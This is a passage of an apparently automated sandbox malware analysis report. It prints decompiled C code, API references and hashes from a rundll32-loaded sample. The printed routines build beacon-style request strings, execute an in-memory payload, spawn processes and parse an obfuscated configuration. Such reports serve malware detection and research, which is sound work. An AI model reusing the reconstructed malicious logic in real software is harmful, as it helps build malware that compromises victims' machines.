Instruction Fuzzy Hash: 3C1181733402009FD754CE59DCC1E96B7AAEF89234B258166ED18CB351F679EC51C760

Uniqueness

Uniqueness Score: -1.00%

Function 6FC88239, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.647783869.000000006FC87000.00000040.00020000.sdmp, Offset: 6FC87000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc87000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: a8416be59c970f3fe58bbcea1fd4b1f681d5b7d6976b5aeca1f7d95f5edb93e8
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: 8601D2363585418FDB48CB2DDA84DE9BBE4EBC2328B19817EC55687A56F134F841CA20

Uniqueness

Uniqueness Score: -1.00%

Function 00A13C32, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 223
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00A13C32(long __eax, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v44;
				void* __ecx;
				void* __edi;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				int _t43;
				void* _t44;
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t63;
				intOrPtr _t67;
				intOrPtr* _t69;
				intOrPtr _t75;
				intOrPtr _t81;
				intOrPtr _t84;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t91;
				int _t94;
				intOrPtr _t95;
				int _t98;
				void* _t101;
				void* _t102;
				void* _t106;
				intOrPtr _t108;
				long _t110;
				intOrPtr _t111;
				intOrPtr* _t112;
				long _t113;
				int _t114;
				void* _t115;
				void* _t116;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;
				void* _t123;
				void* _t124;

				_t106 = __edx;
				_t113 = __eax;
				_v8 = 8;
				_t120 = RtlAllocateHeap( *0xa1d1f0, 0, 0x800);
				if(_t120 != 0) {
					if(_t113 == 0) {
						_t113 = GetTickCount();
					}
					_t32 =  *0xa1d018; // 0x9b3d54d7
					asm("bswap eax");
					_t33 =  *0xa1d014; // 0x5cb11ae7
					asm("bswap eax");
					_t34 =  *0xa1d010; // 0x15dc9586
					asm("bswap eax");
					_t35 =  *0xa1d00c; // 0xf5f4113d
					asm("bswap eax");
					_t36 =  *0xa1d230; // 0x4a6a5a8
					_t2 = _t36 + 0xa1e622; // 0x74666f73
					_t114 = wsprintfA(_t120, _t2, 2, 0x3d13b, _t35, _t34, _t33, _t32,  *0xa1d02c,  *0xa1d004, _t113);
					_t39 = E00A17C63();
					_t40 =  *0xa1d230; // 0x4a6a5a8
					_t3 = _t40 + 0xa1e662; // 0x74707526
					_t43 = wsprintfA(_t114 + _t120, _t3, _t39);
					_t123 = _t121 + 0x38;
					_t115 = _t114 + _t43;
					if(_a12 != 0) {
						_t95 =  *0xa1d230; // 0x4a6a5a8
						_t7 = _t95 + 0xa1e66d; // 0x732526
						_t98 = wsprintfA(_t115 + _t120, _t7, _a12);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t98;
					}
					_t44 = E00A14930(_t102);
					_t45 =  *0xa1d230; // 0x4a6a5a8
					_t9 = _t45 + 0xa1e38a; // 0x6d697426
					_t116 = _t115 + wsprintfA(_t115 + _t120, _t9, _t44, _t106);
					_t49 =  *0xa1d230; // 0x4a6a5a8
					_t11 = _t49 + 0xa1e33b; // 0x74636126
					_t117 = _t116 + wsprintfA(_t116 + _t120, _t11, 0);
					_t53 =  *0xa1d284; // 0x54895b0
					_t124 = _t123 + 0x1c;
					if(_t53 != 0) {
						_t91 =  *0xa1d230; // 0x4a6a5a8
						_t13 = _t91 + 0xa1e685; // 0x73797326
						_t94 = wsprintfA(_t117 + _t120, _t13, _t53);
						_t124 = _t124 + 0xc;
						_t117 = _t117 + _t94;
					}
					_t108 =  *0xa1d2d4; // 0x5489630
					_a28 = E00A166E0(0xa1d00a, _t108 + 4);
					_t56 =  *0xa1d278; // 0x54895e0
					_t110 = 0;
					if(_t56 != 0) {
						_t87 =  *0xa1d230; // 0x4a6a5a8
						_t16 = _t87 + 0xa1e8ea; // 0x3d736f26
						_t90 = wsprintfA(_t117 + _t120, _t16, _t56);
						_t124 = _t124 + 0xc;
						_t117 = _t117 + _t90;
					}
					_t57 =  *0xa1d274; // 0x0
					if(_t57 != _t110) {
						_t84 =  *0xa1d230; // 0x4a6a5a8
						_t18 = _t84 + 0xa1e8c1; // 0x3d706926
						wsprintfA(_t117 + _t120, _t18, _t57);
					}
					if(_a28 != _t110) {
						_t101 = RtlAllocateHeap( *0xa1d1f0, _t110, 0x800);
						if(_t101 != _t110) {
							E00A128E3(GetTickCount());
							_t63 =  *0xa1d2d4; // 0x5489630
							__imp__(_t63 + 0x40);
							asm("lock xadd [eax], ecx");
							_t67 =  *0xa1d2d4; // 0x5489630
							__imp__(_t67 + 0x40);
							_t69 =  *0xa1d2d4; // 0x5489630
							_t118 = E00A149EC(1, _t106, _t120,  *_t69);
							asm("lock xadd [eax], ecx");
							if(_t118 != _t110) {
								StrTrimA(_t118, 0xa1c2c4);
								_t75 =  *0xa1d230; // 0x4a6a5a8
								_push(_t118);
								_t20 = _t75 + 0xa1e2d2; // 0x53002f
								_t111 = E00A19FA4(_t20);
								_v8 = _t111;
								if(_t111 != 0) {
									 *_t118 = 0;
									__imp__(_t101, _a4);
									_t112 = __imp__;
									 *_t112(_t101, _t111);
									 *_t112(_t101, _t118);
									_t81 = E00A1A23C(0xffffffffffffffff, _t101, _v16, _v12);
									_v44 = _t81;
									if(_t81 != 0 && _t81 != 0x10d2) {
										E00A154F9();
									}
									HeapFree( *0xa1d1f0, 0, _v28);
								}
								HeapFree( *0xa1d1f0, 0, _t118);
								_t110 = 0;
							}
							HeapFree( *0xa1d1f0, _t110, _t101);
						}
						HeapFree( *0xa1d1f0, _t110, _a20);
					}
					HeapFree( *0xa1d1f0, _t110, _t120);
				}
				return _v16;
			}

0x00a13c32
0x00a13c46
0x00a13c48
0x00a13c56
0x00a13c5a
0x00a13c62
0x00a13c6a
0x00a13c6a
0x00a13c6c
0x00a13c78
0x00a13c87
0x00a13c8c
0x00a13c8f
0x00a13c94
0x00a13c97
0x00a13c9c
0x00a13c9f
0x00a13cab
0x00a13cb8
0x00a13cba
0x00a13cc0
0x00a13cc5
0x00a13cd0
0x00a13cd2
0x00a13cd5
0x00a13cdb
0x00a13cdd
0x00a13ce6
0x00a13cf1
0x00a13cf3
0x00a13cf6
0x00a13cf6
0x00a13cf8
0x00a13cff
0x00a13d04
0x00a13d11
0x00a13d13
0x00a13d18
0x00a13d26
0x00a13d28
0x00a13d2d
0x00a13d32
0x00a13d35
0x00a13d3a
0x00a13d45
0x00a13d47
0x00a13d4a
0x00a13d4a
0x00a13d4c
0x00a13d5f
0x00a13d63
0x00a13d68
0x00a13d6c
0x00a13d6f
0x00a13d74
0x00a13d7f
0x00a13d81
0x00a13d84
0x00a13d84
0x00a13d86
0x00a13d8d
0x00a13d90
0x00a13d95
0x00a13d9f
0x00a13da1
0x00a13da8
0x00a13dc0
0x00a13dc4
0x00a13dd0
0x00a13dd5
0x00a13dde
0x00a13def
0x00a13df3
0x00a13dfc
0x00a13e02
0x00a13e0f
0x00a13e1c
0x00a13e22
0x00a13e2e
0x00a13e34
0x00a13e39
0x00a13e3a
0x00a13e46
0x00a13e4a
0x00a13e4e
0x00a13e54
0x00a13e58
0x00a13e5f
0x00a13e66
0x00a13e6a
0x00a13e75
0x00a13e7c
0x00a13e80
0x00a13e89
0x00a13e89
0x00a13e9a
0x00a13e9a
0x00a13ea9
0x00a13eaf
0x00a13eaf
0x00a13eb9
0x00a13eb9
0x00a13eca
0x00a13eca
0x00a13ed8
0x00a13ed8
0x00a13ee8

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00A13C50
GetTickCount.KERNEL32 ref: 00A13C64
wsprintfA.USER32 ref: 00A13CB3
wsprintfA.USER32 ref: 00A13CD0
wsprintfA.USER32 ref: 00A13CF1
wsprintfA.USER32 ref: 00A13D0F
wsprintfA.USER32 ref: 00A13D24
wsprintfA.USER32 ref: 00A13D45
wsprintfA.USER32 ref: 00A13D7F
wsprintfA.USER32 ref: 00A13D9F
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A13DBA
GetTickCount.KERNEL32 ref: 00A13DCA
RtlEnterCriticalSection.NTDLL(054895F0), ref: 00A13DDE
RtlLeaveCriticalSection.NTDLL(054895F0), ref: 00A13DFC

Part of subcall function 00A149EC: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,00A13E0F,00000000,05489630), ref: 00A14A17
Part of subcall function 00A149EC: lstrlen.KERNEL32(00000000,?,00000000,00A13E0F,00000000,05489630), ref: 00A14A1F
Part of subcall function 00A149EC: strcpy.NTDLL ref: 00A14A36
Part of subcall function 00A149EC: lstrcat.KERNEL32(00000000,00000000), ref: 00A14A41
Part of subcall function 00A149EC: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00A13E0F,?,00000000,00A13E0F,00000000,05489630), ref: 00A14A5E

StrTrimA.SHLWAPI(00000000,00A1C2C4,00000000,05489630), ref: 00A13E2E

Part of subcall function 00A19FA4: lstrlen.KERNEL32(00A13E46,00000000,00000000,00A13E46,0053002F,00000000), ref: 00A19FB0
Part of subcall function 00A19FA4: lstrlen.KERNEL32(?), ref: 00A19FB8
Part of subcall function 00A19FA4: lstrcpy.KERNEL32(00000000,?), ref: 00A19FCF
Part of subcall function 00A19FA4: lstrcat.KERNEL32(00000000,?), ref: 00A19FDA

lstrcpy.KERNEL32(00000000,?), ref: 00A13E58
lstrcat.KERNEL32(00000000,00000000), ref: 00A13E66
lstrcat.KERNEL32(00000000,00000000), ref: 00A13E6A
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00A13E9A
HeapFree.KERNEL32(00000000,00000000,0053002F,00000000), ref: 00A13EA9
HeapFree.KERNEL32(00000000,00000000,00000000,05489630), ref: 00A13EB9
HeapFree.KERNEL32(00000000,?), ref: 00A13ECA
HeapFree.KERNEL32(00000000,00000000), ref: 00A13ED8

Strings

Uxt, xrefs: 00A13E9A, 00A13EA9, 00A13EB9, 00A13ECA, 00A13ED8

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID: Uxt
API String ID: 1837416118-1536154274
Opcode ID: 5dd0b80d3c3d7d5e269cc813244651a9e0a7bdcb026d4df1adf50bfaaf51b4f3
Instruction ID: 709b580b3f19b6222e3d1299a43e3733ceb1cdb2fc75d79fafd740da4c529df4
Opcode Fuzzy Hash: 5dd0b80d3c3d7d5e269cc813244651a9e0a7bdcb026d4df1adf50bfaaf51b4f3
Instruction Fuzzy Hash: 8A715872500215AFD721EFE8ED88EE777ECFB8C314B058515F859C7220E639E9468BA4

Uniqueness

Uniqueness Score: -1.00%

Function 6FC5E2F0, Relevance: 19.7, APIs: 13, Instructions: 172COMMONLIBRARYCODE

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 6FC5E327
_strncmp.LIBCMT ref: 6FC5E349
_strncmp.LIBCMT ref: 6FC5E36B

Memory Dump Source

Source File: 00000002.00000002.647449462.000000006FC50000.00000020.00020000.sdmp, Offset: 6FC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc50000_rundll32.jbxd

Similarity

API ID: _strncmp
String ID:
API String ID: 909875538-0
Opcode ID: fde21c118e528124b8954f39e9119bbc506c1952eb8b9aace45154776987b9d0
Instruction ID: b4c6ca8ad2ce68d28e82a5b0ab8abafa0c9c086000ef8630109c2612508a63a6
Opcode Fuzzy Hash: fde21c118e528124b8954f39e9119bbc506c1952eb8b9aace45154776987b9d0
Instruction Fuzzy Hash: 9D411772B4971026D2345B0D7D42B4BF7A95FF0B59F00882AF845EA285F761E87AC7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A3FC, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 111
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00A1A3FC(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t42;
				intOrPtr _t49;
				void* _t51;
				intOrPtr _t52;
				void* _t60;
				intOrPtr* _t65;
				intOrPtr _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t39 = E00A1484A(__ecx,  *(_t69 + 0xc),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t69 + 8),  *(_t69 + 0xc));
				_t42 = _v12(_v12);
				_v8 = _t42;
				if(_t42 == 0 && ( *0xa1d218 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t49 =  *0xa1d230; // 0x4a6a5a8
					_t18 = _t49 + 0xa1e55b; // 0x73797325
					_t51 = E00A199D3(_t18);
					_v12 = _t51;
					if(_t51 == 0) {
						_v8 = 8;
					} else {
						_t52 =  *0xa1d230; // 0x4a6a5a8
						_t20 = _t52 + 0xa1e73d; // 0x5488ce5
						_t21 = _t52 + 0xa1e0af; // 0x4e52454b
						_t65 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t65 == 0) {
							_v8 = 0x7f;
						} else {
							_t71 = __imp__;
							_v108 = 0x44;
							 *_t71(0);
							_t60 =  *_t65(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t71(1);
							if(_t60 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xa1d1f0, 0, _v12);
					}
				}
				_t74 = _v16;
				 *((intOrPtr*)(_t74 + 0x18))( *((intOrPtr*)(_t74 + 0x1c))( *_t74));
				E00A1A07B(_t74);
				goto L12;
			}

0x00a1a405
0x00a1a405
0x00a1a413
0x00a1a41c
0x00a1a41f
0x00a1a534
0x00a1a53b
0x00a1a53b
0x00a1a42e
0x00a1a439
0x00a1a43e
0x00a1a441
0x00a1a456
0x00a1a45c
0x00a1a45d
0x00a1a460
0x00a1a466
0x00a1a469
0x00a1a46e
0x00a1a476
0x00a1a47d
0x00a1a484
0x00a1a487
0x00a1a51b
0x00a1a48d
0x00a1a48d
0x00a1a492
0x00a1a499
0x00a1a4ad
0x00a1a4b1
0x00a1a502
0x00a1a4b3
0x00a1a4b3
0x00a1a4ba
0x00a1a4c1
0x00a1a4d9
0x00a1a4df
0x00a1a4e3
0x00a1a4fd
0x00a1a4e5
0x00a1a4ee
0x00a1a4f3
0x00a1a4f3
0x00a1a4e3
0x00a1a513
0x00a1a513
0x00a1a487
0x00a1a522
0x00a1a52b
0x00a1a52f
0x00000000

APIs

Part of subcall function 00A1484A: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00A1A418,?,?,?,?,00000000,00000000), ref: 00A1486F
Part of subcall function 00A1484A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00A14891
Part of subcall function 00A1484A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00A148A7
Part of subcall function 00A1484A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00A148BD
Part of subcall function 00A1484A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00A148D3
Part of subcall function 00A1484A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00A148E9

memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 00A1A42E
memset.NTDLL ref: 00A1A469

Part of subcall function 00A199D3: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00A17E58,73797325), ref: 00A199E4
Part of subcall function 00A199D3: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00A199FE

GetModuleHandleA.KERNEL32(4E52454B,05488CE5,73797325), ref: 00A1A4A0
GetProcAddress.KERNEL32(00000000), ref: 00A1A4A7
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00A1A4C1
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00A1A4DF
CloseHandle.KERNEL32(00000000), ref: 00A1A4EE
CloseHandle.KERNEL32(?), ref: 00A1A4F3
GetLastError.KERNEL32 ref: 00A1A4F7
HeapFree.KERNEL32(00000000,?), ref: 00A1A513

Strings

Uxt, xrefs: 00A1A513

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemcpymemset
String ID: Uxt
API String ID: 1222765985-1536154274
Opcode ID: 852e4c0bd3c9e07715557783c222e037d0bbaa2183dd8d56f25997870d5fccbc
Instruction ID: 3d1a7750e62782742aa38f946fa623e56eea68bf0f1df430301325e0fa72fe6f
Opcode Fuzzy Hash: 852e4c0bd3c9e07715557783c222e037d0bbaa2183dd8d56f25997870d5fccbc
Instruction Fuzzy Hash: C4414576901219FFCB11EBE4DC48ADEBFB9EF08364F108451E206A7120D7759A86DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6FC68DDA, Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDecodePointer.NTDLL ref: 6FC68DE2
_free.LIBCMT ref: 6FC68DFB

Part of subcall function 6FC64FA7: HeapFree.KERNEL32(00000000,00000000,?,6FC6A421), ref: 6FC64FBB
Part of subcall function 6FC64FA7: GetLastError.KERNEL32(00000000,?,6FC6A421), ref: 6FC64FCD

_free.LIBCMT ref: 6FC68E0E
_free.LIBCMT ref: 6FC68E2C
_free.LIBCMT ref: 6FC68E3E
_free.LIBCMT ref: 6FC68E4F
_free.LIBCMT ref: 6FC68E5A
_free.LIBCMT ref: 6FC68E7E
RtlEncodePointer.NTDLL(6FC914C8), ref: 6FC68E85
_free.LIBCMT ref: 6FC68E9A
_free.LIBCMT ref: 6FC68EB0
_free.LIBCMT ref: 6FC68ED8

Memory Dump Source

Source File: 00000002.00000002.647449462.000000006FC50000.00000020.00020000.sdmp, Offset: 6FC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc50000_rundll32.jbxd

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID:
API String ID: 3064303923-0
Opcode ID: c20a58f98ffcb92629698b01f47ff186681752cbfc73ee6e2d5dec78adccf641
Instruction ID: c87aad166e08b2800e089fe3561e9405513e63b4f3dec664d306b27ae9304385
Opcode Fuzzy Hash: c20a58f98ffcb92629698b01f47ff186681752cbfc73ee6e2d5dec78adccf641
Instruction Fuzzy Hash: C9216F7A90DA12CBDF115F1CD8D0C997BF8BB47734304012AEA68972C4E736E8A48B91

Uniqueness

Uniqueness Score: -1.00%

Function 00A16470, Relevance: 15.1, APIs: 10, Instructions: 102
stringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00A16470(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				intOrPtr _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				void* _t69;
				intOrPtr* _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr* _t85;
				intOrPtr _t88;

				_t74 = __ecx;
				_t79 =  *0xa1d2ec; // 0x5489c40
				_v20 = 8;
				_v16 = GetTickCount();
				_t42 = E00A169A9(_t74,  &_v16);
				_v12 = _t42;
				if(_t42 == 0) {
					_v12 = 0xa1c1cc;
				}
				_t44 = E00A199A0(_t79);
				_v8 = _t44;
				if(_t44 != 0) {
					_t85 = __imp__;
					_t46 =  *_t85(_v12, _t69);
					_t47 =  *_t85(_v8);
					_t48 =  *_t85(_a4);
					_t49 = lstrlenW(_a8);
					_t53 = E00A1550F(lstrlenW(0xa1ead8) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0xa1ead8) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
					_v16 = _t53;
					if(_t53 != 0) {
						_t75 =  *0xa1d230; // 0x4a6a5a8
						_t73 =  *0xa1d120; // 0xa1aab3
						_t18 = _t75 + 0xa1ead8; // 0x530025
						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
						_t56 =  *_t85(_v8);
						_a8 = _t56;
						_t57 =  *_t85(_a4);
						_t58 = lstrlenW(_a12);
						_t88 = E00A1550F(lstrlenW(0xa1ebf8) + _a8 + _t57 + _t58 + lstrlenW(0xa1ebf8) + _a8 + _t57 + _t58 + 2);
						if(_t88 == 0) {
							E00A1A07B(_v16);
						} else {
							_t64 =  *0xa1d230; // 0x4a6a5a8
							_t31 = _t64 + 0xa1ebf8; // 0x73006d
							 *_t73(_t88, _t31, _a4, _v8, _a12);
							 *_a16 = _v16;
							_v20 = _v20 & 0x00000000;
							 *_a20 = _t88;
						}
					}
					E00A1A07B(_v8);
				}
				return _v20;
			}

0x00a16470
0x00a16478
0x00a1647e
0x00a1648e
0x00a16491
0x00a16498
0x00a1649b
0x00a1649d
0x00a1649d
0x00a164a6
0x00a164ad
0x00a164b0
0x00a164b6
0x00a164c0
0x00a164c9
0x00a164d0
0x00a164de
0x00a164f0
0x00a164f7
0x00a164fa
0x00a16503
0x00a1650c
0x00a16515
0x00a16523
0x00a1652b
0x00a16530
0x00a16533
0x00a1653e
0x00a16555
0x00a16559
0x00a1658c
0x00a1655b
0x00a1655e
0x00a16566
0x00a16571
0x00a16579
0x00a16581
0x00a16585
0x00a16585
0x00a16559
0x00a16594
0x00a16599
0x00a165a0

APIs

GetTickCount.KERNEL32 ref: 00A16485
lstrlen.KERNEL32(00000000,80000002), ref: 00A164C0
lstrlen.KERNEL32(?), ref: 00A164C9
lstrlen.KERNEL32(00000000), ref: 00A164D0
lstrlenW.KERNEL32(80000002), ref: 00A164DE
lstrlenW.KERNEL32(00A1EAD8), ref: 00A164E7
lstrlen.KERNEL32(?), ref: 00A1652B
lstrlen.KERNEL32(?), ref: 00A16533
lstrlenW.KERNEL32(?), ref: 00A1653E
lstrlenW.KERNEL32(00A1EBF8), ref: 00A16547

Part of subcall function 00A1A07B: HeapFree.KERNEL32(00000000,00000000,00A18705,00000000,?,?,00000000,?,?,?,?,?,?,00A12540,00000000), ref: 00A1A087

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 02f964e5511e4f1f5ab3b8dcc6ddc8a47c5b7e32bb1587d61a74d954d1f4fb3d
Instruction ID: c28e764e172371bdcd3c9d8b3f6f24344bcf346b08158ec0267f6358748f63b8
Opcode Fuzzy Hash: 02f964e5511e4f1f5ab3b8dcc6ddc8a47c5b7e32bb1587d61a74d954d1f4fb3d
Instruction Fuzzy Hash: ED315676900219FFCF01EFA4CD448DEBBBAFF48364B058065E918A7221DB359A51DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A14D8D, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 185
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00A14D8D(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t18;
				signed int _t23;
				char* _t29;
				char* _t30;
				char* _t31;
				char* _t32;
				char* _t33;
				void* _t34;
				void* _t35;
				signed int _t40;
				void* _t42;
				void* _t43;
				signed int _t45;
				signed int _t49;
				signed int _t53;
				signed int _t57;
				signed int _t61;
				signed int _t65;
				void* _t70;
				intOrPtr _t85;

				_t71 = __ecx;
				_t18 =  *0xa1d22c; // 0x63699bc3
				if(E00A17B3F( &_v12,  &_v8, _t18 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0xa1d27c = _v12;
				}
				_t23 =  *0xa1d22c; // 0x63699bc3
				if(E00A17B3F( &_v12,  &_v8, _t23 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L48;
				} else {
					_t70 = _v12;
					if(_t70 == 0) {
						_t29 = 0;
					} else {
						_t65 =  *0xa1d22c; // 0x63699bc3
						_t29 = E00A1289C(_t71, _t70, _t65 ^ 0x724e87bc);
					}
					if(_t29 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
							 *0xa1d1f8 = _v8;
						}
					}
					if(_t70 == 0) {
						_t30 = 0;
					} else {
						_t61 =  *0xa1d22c; // 0x63699bc3
						_t30 = E00A1289C(_t71, _t70, _t61 ^ 0x2b40cc40);
					}
					if(_t30 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
							 *0xa1d1fc = _v8;
						}
					}
					if(_t70 == 0) {
						_t31 = 0;
					} else {
						_t57 =  *0xa1d22c; // 0x63699bc3
						_t31 = E00A1289C(_t71, _t70, _t57 ^ 0x3b27c2e6);
					}
					if(_t31 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0xa1d200 = _v8;
						}
					}
					if(_t70 == 0) {
						_t32 = 0;
					} else {
						_t53 =  *0xa1d22c; // 0x63699bc3
						_t32 = E00A1289C(_t71, _t70, _t53 ^ 0x0602e249);
					}
					if(_t32 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0xa1d004 = _v8;
						}
					}
					if(_t70 == 0) {
						_t33 = 0;
					} else {
						_t49 =  *0xa1d22c; // 0x63699bc3
						_t33 = E00A1289C(_t71, _t70, _t49 ^ 0x3603764c);
					}
					if(_t33 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0xa1d02c = _v8;
						}
					}
					if(_t70 == 0) {
						_t34 = 0;
					} else {
						_t45 =  *0xa1d22c; // 0x63699bc3
						_t34 = E00A1289C(_t71, _t70, _t45 ^ 0x2cc1f2fd);
					}
					if(_t34 != 0) {
						_push(_t34);
						_t42 = 0x10;
						_t43 = E00A18E3C(_t42);
						if(_t43 != 0) {
							_push(_t43);
							E00A16BB2();
						}
					}
					if(_t70 == 0) {
						_t35 = 0;
					} else {
						_t40 =  *0xa1d22c; // 0x63699bc3
						_t35 = E00A1289C(_t71, _t70, _t40 ^ 0xb30fc035);
					}
					if(_t35 != 0 && E00A18E3C(0, _t35) != 0) {
						_t85 =  *0xa1d2d4; // 0x5489630
						E00A1A302(_t85 + 4, _t38);
					}
					HeapFree( *0xa1d1f0, 0, _t70);
					L48:
					return 0;
				}
			}

0x00a14d8d
0x00a14d90
0x00a14db0
0x00a14dbe
0x00a14dbe
0x00a14dc3
0x00a14ddd
0x00a14f64
0x00a14f66
0x00000000
0x00a14de3
0x00a14de3
0x00a14dea
0x00a14e00
0x00a14dec
0x00a14dec
0x00a14df9
0x00a14df9
0x00a14e0a
0x00a14e0c
0x00a14e16
0x00a14e1b
0x00a14e1b
0x00a14e16
0x00a14e22
0x00a14e38
0x00a14e24
0x00a14e24
0x00a14e31
0x00a14e31
0x00a14e3c
0x00a14e3e
0x00a14e48
0x00a14e4d
0x00a14e4d
0x00a14e48
0x00a14e54
0x00a14e6a
0x00a14e56
0x00a14e56
0x00a14e63
0x00a14e63
0x00a14e6e
0x00a14e70
0x00a14e7a
0x00a14e7f
